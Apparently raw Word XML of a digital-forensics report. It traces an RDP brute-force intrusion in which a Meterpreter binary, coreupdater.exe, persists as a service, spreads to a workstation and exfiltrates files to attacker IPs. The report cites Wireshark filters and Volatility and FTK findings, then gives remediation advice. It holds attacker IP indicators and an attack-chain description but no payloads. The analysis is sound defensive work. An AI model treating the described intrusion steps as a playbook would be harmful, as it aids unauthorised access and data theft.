                <v:imagedata r:id="rId42"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20:  Showing</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Where is this malware on disk?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> YES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used Windows.pstree.pstree on Volatility3 workbench as shown below to get the location. Also using the FTK imager on the DC01 image and following the path partition 2 &gt; root &gt; windows &gt; system32 , we locate the coreupdater.exe file as shown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13372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6354" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId43"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3133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8.00pt;height:246.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId43"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21. Showing the Windows event log folders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1485900" cy="66675"/>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3573" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId44"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1485900" cy="666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17.00pt;height:5.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId44" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="3038475"/>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36111" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId45"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="30384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68.00pt;height:239.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId45"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22. Volatility WorkBench Showing the Windows event log folders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When did it first appear?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Using wireshark with run filter  ip.src == 194.61.24.102 &amp;&amp; HTTP filter as the image shown below, the time it first appeared was 2020-09-18-22:24:06.9999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591175" cy="2981325"/>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0713" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId46"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5591174" cy="2981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40.25pt;height:234.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId46"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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing when the Coreupdater.exe was first seen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Did someone move it?  Yes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Using ip.src == 194.61.24.102 &amp;&amp; HTTP filter as the image shown below, shows the file was also sent to another IP 10.42.85.115</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17182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515" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId47"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3171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68.00pt;height:249.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId47"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24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing the coreupdater.exe file sent to another IP</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were the capabilities of this malware?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When we ran the file hash in VirusTotal, we can see community identifiers have indicated this to be Meterpreter/Metasploit as shown below. This tool has a vast array of capabilities as it provides the attacker with a shell to the victim machine. From here </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">they are able to further explore the victims device, pivot to other devices in the network or run/execute other payloads and commands.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55282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5177" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId48"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="35528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8.00pt;height:279.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId48"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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal Community showing the capabilities when we run the hash</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Is this malware easily obtained?</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Metasploit is a red teaming tool which is open source, so safe to say pretty accessible.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Was this malware installed with persistence on any machine?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As persistence is commonly obtained through scheduled tasks, registry keys and services we can check the relavent artifacts around the time of the download and execution of the malware.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From the system eventlogs we can check for the event id 7045 which logs any newly installed services. It is here, we can identify a newly installed service which is set to run at start up of the system.</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 installation of the service, “coreupdater”, first occurred on the DC at 9/18/2020 11:27:49PM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019425"/>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08839" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId49"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3019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8.00pt;height:237.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId49"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25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">DC System Event logs showing event id 7045</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Loaded the Desktop image into ftk imager to extract the system events logs, save and analyze them. The installation of the service, “coreupdater”, first occurred on the DESKTOP-SDN1RPT at 9/18/2020 11:42:42PM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857875" cy="311467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520738" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId50"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5857875" cy="31146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1.25pt;height:245.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId50"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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Desktop System Event logs showing event id 7045</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malicious IP Addresses were involved?</w:t>
      </w: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Yes there was, 194.61.24.102 and 203.78.103.109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762375"/>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85734" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId51"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="37623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8.00pt;height:296.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId51"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27 Wireshark showing  Malicious IP  194.61.24.102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695950" cy="3638550"/>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25522" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId52"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5695949" cy="363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48.50pt;height:286.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId52"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27 Volatility3 showing  Malicious IP  203.78.103.109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Were any IP Addresses from known adversary infrastructure?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Yes when both IP's were flagged in AlienVault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581400"/>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65754" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId53"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="35813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68.00pt;height:282.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId53"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29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">AlienVault showing IP address 194.61.24.102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590925"/>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40781" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId54"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3590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68.00pt;height:282.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId54"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30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">AlienVault showing IP address  203.78.103.109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These AV detection's were for files which have been flagged for similar network traffic observed in this attack.</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59092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65337" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId55"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3590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68.00pt;height:282.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId55"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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Alien Vault showing analysis of the malware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Did the attacker access any other systems? How? When?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From our analysis so far, we know its a RDP brute force attack, So I did a RDP filter search on the pcap file in wireshark as shown below.</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705475" cy="2990850"/>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87916" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId56"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5705474" cy="299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49.25pt;height:235.50pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId56"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32 Wireshark showing the negotiation between IP 10.42.85.10 and 10.42.85.115 via RDP</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We noticed a Negotiate request and response between 10.42.85.10 and 10.42.85.115 proving the attacker gained access to another workstation (DESKTOP-SDN1RPT) via RDP, This occurred at approximately 2:36 on 2020-09-18</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Did the attacker steal or access any data?</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noticed the secret folder was accessed with several files in it accessed as shown below in the ftk imager . I also noticed the file  $I30  was created on the day created and accessed around the time of the exploit.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152775"/>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4429" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId57"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3152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8.00pt;height:248.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId57"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33  Showing the Fileshare Folder</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proceeded to the path partition 2 &gt; root &gt; users &gt; Administrator &gt; AppData &gt; Local &gt; Temp</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It was noticed the $I30  files was recently transferred or copied at approximately 22:36pm 2020-09-18</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152775"/>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49632" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId58"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="3152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8.00pt;height:248.25pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId58"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34 Showing the AppData\Temps Folder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 correlated Data Access with Network Activity (PCAP Analysis)  at around this  22:36pm 2020-09-18 to see if there was exfiltration of data</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Based on the image below, using the filter tcp.len &gt;0 &amp;&amp; ip.dst == 203.78.103.109 we see that the attacker was able to exfiltrate  files from the DC’s fileshare starting approximately at 22:40pm 2020-09-18 to the destination IP 203.78.103.109.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MITRE ATT&amp;CK Reference: Exfiltration over Command and Control Channel (T1041).</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800725" cy="3086100"/>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36123" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId59"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5800725" cy="30861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6.75pt;height:243.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId59"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35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing the tcp.len &gt;0 &amp;&amp; ip.dst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Also using the tcp.stream filter as shown below we were able to see data movement from 10.42.85.10 to 194.61.24.102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943600" cy="3162300"/>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12124" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId60"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943599" cy="31622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68.00pt;height:249.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId60"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Fig 36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark showing the  tcp.stream filter</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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">What was the network layout of the victim network?</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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5705475" cy="304800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4788" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId61"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5705474" cy="30479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9.25pt;height:240.00pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId61"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139"/>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34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>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Conclusion</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The forensic analysis confirms that the attacker gained access to the network via an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">RDP brute-force attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, deployed malware (coreupdater.exe), and exfiltrated sensitive files to a remote IP address (203.78.103.109). The malware, identified as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowed the attacker to establish persistence and access additional systems. The outdated operating systems and lack of multi-factor authentication facilitated the attack.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="139"/>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Recommendations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Multi-Factor Authentication (MFA)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> for all remote access systems to mitigate brute-force attacks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Patch Systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Upgrade Windows Server 2012 R2 to supported versions and apply security patches for RDP vulnerabilities.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Enhance Network Monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deploy intrusion detection systems (IDS) and monitor traffic for anomalies.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Implement Strong Password Policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enforce complexity and lockout mechanisms for failed login attempts.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Review Firewall Rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Restrict RDP access to trusted IPs.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct User Training</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Educate employees on phishing and credential protection.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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2"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy Endpoint Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use anti-malware tools to detect and block malicious executables.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139"/>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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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MITRE ATT&amp;CK Framework. (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
